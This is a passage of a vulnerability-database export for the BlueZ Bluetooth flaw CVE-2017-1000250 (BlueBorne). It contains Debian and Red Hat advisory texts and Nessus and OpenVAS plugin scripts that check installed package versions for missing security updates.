hcitool, hciattach, hciconfig, bluetoothd,\nl2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es) :\n\n* An information-disclosure flaw was found in the bluetoothd\nimplementation of the Service Discovery Protocol (SDP). A specially\ncrafted Bluetooth device could, without prior pairing or user\ninteraction, retrieve portions of the bluetoothd process memory,\nincluding potentially sensitive information such as Bluetooth\nencryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-2685.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?26b736f1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017:2685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bluez / bluez-alsa / bluez-compat / bluez-cups / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:bluez-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"bluez-4.66-2.vl6\",\n \"bluez-alsa-4.66-2.vl6\",\n \"bluez-compat-4.66-2.vl6\",\n \"bluez-cups-4.66-2.vl6\",\n \"bluez-gstreamer-4.66-2.vl6\",\n \"bluez-libs-4.66-2.vl6\",\n \"bluez-libs-devel-4.66-2.vl6\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez / bluez-alsa / bluez-compat / bluez-cups / etc\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T09:38:39", "description": "The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive\ninformation from the bluetoothd process memory. This vulnerability\nlies in the processing of SDP search attribute requests.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 17, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-09-22T00:00:00", "title": "Debian DLA-1103-1 : bluez security update (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2017-09-22T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:bluez", "p-cpe:/a:debian:debian_linux:libbluetooth-dev", "p-cpe:/a:debian:debian_linux:bluez-cups", "p-cpe:/a:debian:debian_linux:bluez-gstreamer", "p-cpe:/a:debian:debian_linux:bluez-pcmcia-support", "p-cpe:/a:debian:debian_linux:bluez-utils", "p-cpe:/a:debian:debian_linux:libbluetooth3-dbg", "p-cpe:/a:debian:debian_linux:bluez-compat", "p-cpe:/a:debian:debian_linux:libbluetooth3", "p-cpe:/a:debian:debian_linux:bluez-dbg", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:bluetooth", "p-cpe:/a:debian:debian_linux:bluez-audio", "p-cpe:/a:debian:debian_linux:bluez-alsa"], "id": "DEBIAN_DLA-1103.NASL", "href": "https://www.tenable.com/plugins/nessus/103390", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1103-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103390);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-1000250\");\n\n script_name(english:\"Debian DLA-1103-1 : bluez security update (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive\ninformation from the bluetoothd process memory. This vulnerability\nlies in the processing of SDP search attribute requests.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bluez\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluetooth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-audio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-gstreamer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-pcmcia-support\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bluez-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbluetooth-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbluetooth3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbluetooth3-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bluetooth\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-alsa\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-audio\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-compat\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-cups\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-dbg\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-gstreamer\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-pcmcia-support\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bluez-utils\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth-dev\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth3\", reference:\"4.99-2+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbluetooth3-dbg\", reference:\"4.99-2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:11:36", "description": "Security fix for CVE-2017-1000250\n\n----\n\n - This update adds support for cable pairing for\n PlayStation 3 and 4 controllers.\n\n - Add scripts to automatically btattach serial-port / uart\n connected Broadcom HCIs found on some Atom based x86\n hardware\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 6.5, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : bluez (2017-77f991e537) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "modified": "2018-01-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bluez", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-77F991E537.NASL", "href": "https://www.tenable.com/plugins/nessus/105904", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-77f991e537.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105904);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000250\");\n script_xref(name:\"FEDORA\", value:\"2017-77f991e537\");\n\n script_name(english:\"Fedora 27 : bluez (2017-77f991e537) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-1000250\n\n----\n\n - This update adds support for cable pairing for\n PlayStation 3 and 4 controllers.\n\n - Add scripts to automatically btattach serial-port / uart\n connected Broadcom HCIs found on some Atom based x86\n hardware\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-77f991e537\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bluez package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bluez\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"bluez-5.46-6.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bluez\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "The bluez packages contain the following utilities for use in Bluetooth applications: hcitool, hciattach, hciconfig, bluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n* An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.", "modified": "2018-06-07T18:22:24", "published": "2017-09-12T18:08:48", "id": "RHSA-2017:2685", "href": "https://access.redhat.com/errata/RHSA-2017:2685", "type": "redhat", "title": "(RHSA-2017:2685) Moderate: bluez security update", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:01:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3972-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 13, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bluez\nCVE ID : CVE-2017-1000250\nDebian Bug : 875633\n\nAn information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\n\nWe recommend that you upgrade your bluez packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2017-09-13T11:54:19", "published": "2017-09-13T11:54:19", "id": "DEBIAN:DSA-3972-1:ACF5D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00234.html", "title": "[SECURITY] [DSA 3972-1] bluez security update", "type": "debian", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:23:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000250"], "description": "Package : bluez\nVersion : 4.99-2+deb7u1\nCVE ID : CVE-2017-1000250\nDebian Bug : 875633\n\nThe SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive information\nfrom the bluetoothd process memory. This vulnerability lies in the processing\nof SDP search attribute requests.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-21T21:01:41", "published": "2017-09-21T21:01:41", "id": "DEBIAN:DLA-1103-1:B4D85", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00020.html", "title": "[SECURITY] [DLA 1103-1] bluez security update", "type": "debian", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811768", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811768", "type": "openvas", "title": "RedHat Update for bluez RHSA-2017:2685-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2685-01_bluez.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for bluez RHSA-2017:2685-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811768\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:15:51 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for bluez RHSA-2017:2685-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). A specially crafted Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2685-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-September/msg00028.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-debuginfo\", rpm:\"bluez-debuginfo~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.el7_4\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-debuginfo\", rpm:\"bluez-debuginfo~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~4.66~2.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "Check the version of bluez", "modified": "2019-03-08T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310882765", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882765", "type": "openvas", "title": "CentOS Update for bluez CESA-2017:2685 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2685_bluez_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for bluez CESA-2017:2685 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882765\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:16:22 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bluez CESA-2017:2685 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of bluez\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). A specially crafted Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would 